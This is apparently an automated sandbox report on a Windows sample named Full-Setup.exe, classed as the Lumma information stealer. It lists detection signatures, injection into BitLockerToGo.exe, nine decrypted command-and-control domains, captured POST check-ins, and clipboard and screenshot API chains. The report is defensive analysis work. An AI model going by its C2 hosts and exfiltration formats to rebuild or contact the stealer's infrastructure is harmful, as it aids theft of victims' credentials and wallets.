Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Full-Setup.exe

Overview

General Information

Sample name:Full-Setup.exe
Analysis ID:1521582
MD5:88a1c446d3d26bfdd2dde2029de24beb
SHA1:ff8ffbbabdc7b4a9af03f9466656ec5167660fff
SHA256:4f6c45165a60433a77d4fce2f5bf06216ef38af6ab7ab6c836aa9f8446de33ba
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • Full-Setup.exe (PID: 6564 cmdline: "C:\Users\user\Desktop\Full-Setup.exe" MD5: 88A1C446D3D26BFDD2DDE2029DE24BEB)
    • BitLockerToGo.exe (PID: 3152 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["vozmeatillu.shop", "stogeneratmns.shop", "drawzhotdog.shop", "ghostreedmnu.shop", "gutterydhowi.shop", "trustterwowqm.shop", "reinforcenh.shop", "offensivedzvju.shop", "fragnantbui.shop"], "Build id": "tLYMe5--111"}
SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-29T00:49:19.735138+020020546531A Network Trojan was detected192.168.2.649715104.21.4.136443TCP
    2024-09-29T00:49:20.843513+020020546531A Network Trojan was detected192.168.2.649716104.21.4.136443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-29T00:49:19.735138+020020498361A Network Trojan was detected192.168.2.649715104.21.4.136443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-29T00:49:20.843513+020020498121A Network Trojan was detected192.168.2.649716104.21.4.136443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-29T00:49:19.574914+020020561651Domain Observed Used for C2 Detected192.168.2.649715104.21.4.136443TCP
    2024-09-29T00:49:20.390732+020020561651Domain Observed Used for C2 Detected192.168.2.649716104.21.4.136443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-29T00:49:19.077754+020020561641Domain Observed Used for C2 Detected192.168.2.6600331.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-29T00:49:18.990662+020020561741Domain Observed Used for C2 Detected192.168.2.6593241.1.1.153UDP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 2.2.BitLockerToGo.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["vozmeatillu.shop", "stogeneratmns.shop", "drawzhotdog.shop", "ghostreedmnu.shop", "gutterydhowi.shop", "trustterwowqm.shop", "reinforcenh.shop", "offensivedzvju.shop", "fragnantbui.shop"], "Build id": "tLYMe5--111"}
    Source: Full-Setup.exeReversingLabs: Detection: 34%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: reinforcenh.shop
    Source: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: stogeneratmns.shop
    Source: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: fragnantbui.shop
    Source: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: drawzhotdog.shop
    Source: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: vozmeatillu.shop
    Source: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: offensivedzvju.shop
    Source: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: ghostreedmnu.shop
    Source: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: gutterydhowi.shop
    Source: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: trustterwowqm.shop
    Source: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
    Source: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
    Source: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tLYMe5--111
    Source: Full-Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.6:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.6:49716 version: TLS 1.2
    Source: Full-Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: BitLockerToGo.pdb source: Full-Setup.exe, 00000000.00000002.2314493525.00000000025FA000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: BitLockerToGo.pdbGCTL source: Full-Setup.exe, 00000000.00000002.2314493525.00000000025FA000.00000004.00001000.00020000.00000000.sdmp
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 68677325h2_2_00446C94
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]2_2_0040EFF8
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_00449F80
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, word ptr [esi+edx*4]2_2_0040C070
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+28h]2_2_0040C070
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]2_2_0040C070
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_0040E080
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, word ptr [edi+eax]2_2_00448120
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh2_2_004441D0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, ecx2_2_004141F6
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+00000878h]2_2_004291A0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [edx], ax2_2_004291A0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov esi, dword ptr [esp+40h]2_2_004291A0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_0042E20E
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_004232D0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh2_2_0042C2E0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh2_2_0042C2E0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h2_2_00415292
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+18h]2_2_00401295
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh2_2_00445310
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]2_2_004323D0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]2_2_004323D0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_004323D0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_004323D0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_004323D0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_004323D0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+58h]2_2_004323D0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]2_2_004323D0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx2_2_004133E4
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h2_2_0044A3A0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]2_2_00431420
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ebp+ecx+00h], 0000h2_2_004274C0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movsx edx, byte ptr [ebp+ebx+00h]2_2_004494C0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_004494C0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [edi], ax2_2_004214F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then dec ebx2_2_0043F510
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h2_2_0044A520
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0042F5E0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movsx edx, byte ptr [ebp+ebx+00h]2_2_004495A0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_004495A0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx2_2_0041260C
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebp+00h], al2_2_0042D624
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then test eax, eax2_2_0041E6E6
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah2_2_0044A690
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push 00000000h2_2_00403710
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_0042C710
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [esi], 00000000h2_2_004157D7
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_004307F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, eax2_2_00408780
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_0043B8C0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_004498A0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_0042B8B2
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]2_2_0042B8B2
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx2_2_00413900
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_00444900
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh2_2_00444900
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]2_2_00444900
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh2_2_004489D0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_004489D0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_0042D9B3
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 44CAAEB6h2_2_00427A60
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+14h]2_2_0040DA70
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_0044AA70
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx2_2_0041FA83
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]2_2_00441A80
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00426B70
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]2_2_0042EB0B
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_00449B30
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]2_2_00404BC0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]2_2_00412B9E
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx2_2_00412B9E
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]2_2_0042EBA0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [esi], ax2_2_00420C60
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], dx2_2_00420C60
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]2_2_00405C00
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]2_2_0042FC31
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]2_2_0040DCC0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+48h]2_2_00413DE2
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_00443D90
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp], 00000000h2_2_0041AF40
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 54CA534Eh2_2_00447F30
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]2_2_00443FC0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h2_2_00430FB0

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2056164 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop) : 192.168.2.6:60033 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056165 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) : 192.168.2.6:49716 -> 104.21.4.136:443
    Source: Network trafficSuricata IDS: 2056174 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (trustterwowqm .shop) : 192.168.2.6:59324 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056165 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) : 192.168.2.6:49715 -> 104.21.4.136:443
    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49716 -> 104.21.4.136:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49716 -> 104.21.4.136:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49715 -> 104.21.4.136:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49715 -> 104.21.4.136:443
    Source: Malware configuration extractorURLs: vozmeatillu.shop
    Source: Malware configuration extractorURLs: stogeneratmns.shop
    Source: Malware configuration extractorURLs: drawzhotdog.shop
    Source: Malware configuration extractorURLs: ghostreedmnu.shop
    Source: Malware configuration extractorURLs: gutterydhowi.shop
    Source: Malware configuration extractorURLs: trustterwowqm.shop
    Source: Malware configuration extractorURLs: reinforcenh.shop
    Source: Malware configuration extractorURLs: offensivedzvju.shop
    Source: Malware configuration extractorURLs: fragnantbui.shop
    Source: Joe Sandbox ViewIP Address: 104.21.4.136 104.21.4.136
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gutterydhowi.shop
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=03XKCjmbDCyhHo5BktRxoxoyo3NZqMvaFNaDOl2gcK0-1727563759-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: gutterydhowi.shop
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: trustterwowqm.shop
    Source: global trafficDNS traffic detected: DNS query: gutterydhowi.shop
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gutterydhowi.shop
    Source: Full-Setup.exeString found in binary or memory: http://.css
    Source: Full-Setup.exeString found in binary or memory: http://.jpg
    Source: Full-Setup.exeString found in binary or memory: http://html4/loose.dtd
    Source: Full-Setup.exeString found in binary or memory: https://DwmFlushTlsAllocIsIconicIsZoomedPtInRectSetFocusdxgi.dll
    Source: Full-Setup.exe, 00000000.00000002.2310510440.0000000002146000.00000004.00001000.00020000.00000000.sdmp, Full-Setup.exe, 00000000.00000002.2310510440.000000000236E000.00000004.00001000.00020000.00000000.sdmp, Full-Setup.exe, 00000000.00000002.2312557976.0000000002446000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signature
    Source: Full-Setup.exe, 00000000.00000002.2314493525.0000000002580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signatureSizes
    Source: Full-Setup.exe, 00000000.00000002.2310510440.000000000236E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signatureZ
    Source: Full-Setup.exe, 00000000.00000002.2310510440.000000000236E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signaturexS
    Source: BitLockerToGo.exe, 00000002.00000002.2326588837.0000000002F7B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2326588837.0000000002F94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gutterydhowi.shop/
    Source: BitLockerToGo.exe, 00000002.00000002.2326588837.0000000002F7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gutterydhowi.shop/R
    Source: BitLockerToGo.exe, 00000002.00000003.2315276259.0000000002F94000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2315276259.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2326588837.0000000002FBD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2315608551.0000000002FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gutterydhowi.shop/api
    Source: BitLockerToGo.exe, 00000002.00000002.2326588837.0000000002F7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gutterydhowi.shop/b
    Source: Full-Setup.exeString found in binary or memory: https://login.chinacloudapi.cn/non-pointer
    Source: Full-Setup.exeString found in binary or memory: https://management.azure.comnil
    Source: BitLockerToGo.exe, 00000002.00000002.2326588837.0000000002F7B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2315243598.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2315608551.0000000002FBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
    Source: BitLockerToGo.exe, 00000002.00000003.2315243598.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2315608551.0000000002FBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownHTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.6:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.6:49716 version: TLS 1.2
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00439240 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00439240
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00439240 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00439240
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004395AA GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,2_2_004395AA
    Source: Full-Setup.exe, 00000000.00000002.2308354197.0000000000E93000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: directInput8Creatememstr_63937bb8-2
    Source: Full-Setup.exe, 00000000.00000002.2308354197.0000000000E93000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: exit hook invoked panicSplit called after Scanflate: internal error: pattern bits too long: gamepaddb: syntax errortoo many pointers (>10)segment length too longunpacking Question.Nameunpacking Question.Typeskipping Question Classmultipart: NextPart: %wvarint integer overflowinvalid UTF-8 in stringmismatching cardinalityunsupported edition: %vinvalid escape sequenceunknown empty width arglatest balancer error: name resolver error: %vproduced zero addressesxml: unsupported type: expected element type <0123456789abcdefABCDEF_function %q not defined&CloseCurlyDoubleQuote;&DoubleContourIntegral;&FilledVerySmallSquare;&NegativeVeryThinSpace;&NotPrecedesSlantEqual;&NotRightTriangleEqual;&NotSucceedsSlantEqual;<a href="#fn:%s">%d</a> <meta charset="utf-8"rle symbol %d >= max %dX-Amz-Copy-Source-RangeP224 point not on curveP256 point not on curveP384 point not on curveP521 point not on curvebad %s slice length: %dinvalid UUID length: %dDwmGetColorizationColorDwmIsCompositionEnabledSetThreadExecutionStateRegisterRawInputDevicesglfw: invalid shape: %dunexpected operator: %sredeclared function: %sinvalid length of arrayinvalid length array %d%v is not a valid tokenunknown accessor: %v.%sinvalid Message.Get on invalid Message.Set on no SubConn is availablenon-existent entity #%dlast resolver error: %vgrpc-status-details-binfinished writing statusGrpc-Status-Details-BinDiacriticalDoubleAcute;NotSquareSupersetEqual;invalid 